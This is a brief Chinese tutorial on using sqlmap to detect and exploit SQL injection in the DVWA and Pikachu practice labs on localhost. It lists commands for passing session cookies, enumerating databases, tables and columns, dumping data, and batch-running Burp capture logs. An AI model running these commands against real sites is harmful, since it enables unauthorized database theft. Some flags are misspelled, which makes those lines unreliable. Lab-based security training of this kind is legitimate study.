window下使用sqlmap探测sql注入漏洞
sql注入:攻击者用非法的参数向服务端执行数据,服务端没有对输入进行校验就直接执行了攻击者输入的非法操作,从而产生sql注入
在python文件夹中放入sqlmap文件夹 后进入cmd 找到文件夹后执行python sqlmap.py
这里对DVWA靶场进行操作
Cookie,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据
- 需要登录才能进行操作的网站查找sql注入漏洞。必须获取到cookie值
或者bp抓包 get类型
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=cu09mt6qi08gfq0tjf1f37ibb3"
有四种类型注入
dump 数据库中数据表中数据: --dump-all
python sqlmap.py -u "url" --cookie="" --dbs
python sqlmap.py -u "url" --cookie="" --dump
python sqlmap.py -u "url" --cookie="" -talbes 所有数据库以及里面的表
python sqlmap.py -u "url" --cookie="" -D 数据库名 -tables 当前数据库以及里面的表
python sqlmap.py -u "url" --cookie="" -D 数据库名 -T 表名 -columns 爆出字段
python sqlmap.py -u "url" --cookie="" -D 数据库名 -T 表名 -C 字段1,字段2 -dump 爆出字段对应的明文
2. 直接抓包 ,生成txt文本直接sql跑
python sqlmap.py -r 1.txt --dbs
3. post类型的包
python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs --level 3 --risk 3 --batch
或者直接放到txt里
3. 批量抓包 跑sql
生成的burp.log和sqlmap.py 放在同一目录
然后就去抓包
抓包完 log 就记录了数据
然后开始跑
python sqlmap.py -l burp.log --batch -smart --level 3 --risk 3
总结,有登录界面先,就抓包拿cookie 然后get类型就cookie=“”,POST类型就data=“id”,或者直接全部丢到txt里跑,配合burp的抓包日志批量跑也可